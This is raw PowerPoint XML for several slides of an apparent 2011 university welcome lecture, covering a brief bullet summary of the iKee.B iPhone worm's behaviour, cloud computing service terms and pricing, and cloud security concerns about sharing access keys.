              </a:spcAft>
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30723" name="Footer Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1447800"/>
            <a:ext cx="495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Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30724" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="304800"/>
            <a:ext cx="3300413" cy="825500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Installation Logic of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>iKee.B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> (duh)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30725" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1066800"/>
            <a:ext cx="3352800" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>A randomly generated ID for the bot client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Installs the preference files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Compresses all SMS message on the local iPhone into a single archive.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>changes the default SSH password from 'alpine' to a new fixed password value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="307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248400"/>
            <a:ext cx="86868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7" descr="bad-ap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976813"/>
            <a:ext cx="1447800" cy="1119187"/>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72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3988" y="4495800"/>
            <a:ext cx="13700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9950" y="457200"/>
            <a:ext cx="573405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Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6172200"/>
            <a:ext cx="9144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i="0"/>
              <a:t>Ehab Ashary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="0"/>
              <a:t>CS691-Summer 2011 University of Colorado, Colorado Springs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86B03ED4-55E6-486A-B9BC-29A44110F5E8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281223559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0025"/>
            <a:ext cx="8382000" cy="978729"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cloud Computing: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>XaaS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Terms</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CaaS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>IaaS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>MaaS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>NaaS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>PaaS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>TaaS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1103313"/>
            <a:ext cx="8410575" cy="5927777"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SaaS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Software as a Service. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eg.g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> doc/group, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>icrosoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>PaaS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Platform as a Service. Amazon EC2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Windows 2008 $0.12/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (server license included) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Linux $0.085/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Small instance: 1.7GB, 1 virtual core, 160GB, 32bits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>24x7 Power, AC, Rack, Space, Security Guard paid!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Six locations world wide; Singapore, Tokyo, Ireland, ..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>IaaS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:  Infrastructure as a Service, CU UIS hosted by host.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>StaaS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Storage as a Service.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Carbonite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ($59/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>yr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>), Amazon S3 (0.14/GB, month; 0.01/1000reqs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86B03ED4-55E6-486A-B9BC-29A44110F5E8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="117734530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0025"/>
            <a:ext cx="8382000" cy="535531"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cloud Computing: Public vs. Private</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="722313"/>
            <a:ext cx="8410575" cy="2936188"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>COS has many Data Centers: HP, Progressive Insurance, FedEx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Expand VMware based server virtualization after AFOSR sponsored NISSSC-EAS “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> data center” was established 2009.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>VMware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Labmanager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> for configuring set of virtual machines as a unit </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>network security classes for secure site exercise (7 VMs with DMZ firewall).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Start using Amazon AWS EC2 2009 in Web system/cluster class </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Explore the use AWS EC2 for delivering MEIA in India</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86B03ED4-55E6-486A-B9BC-29A44110F5E8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2" descr="C:\work\cucs\chow\picture\appleIphone\800AAAAA\IMG_029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3484354"/>
            <a:ext cx="4121516" cy="30784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work\cucs\chow\picture\appleIphone\800AAAAA\IMG_029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2516" y="3484354"/>
            <a:ext cx="2258306" cy="3023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80484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0025"/>
            <a:ext cx="8382000" cy="535531"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security Issues in Cloud Computing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330200" y="709613"/>
            <a:ext cx="8410575" cy="2751522"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>atch 4/7/11 Cloud Security Panel video at NIST </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>AWS allows command line interface to create/manage virtual machines (AMI instances)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Require the use of access keys when submit request with these command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Challenges: Enable students to sharing the access keys without revealing them.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
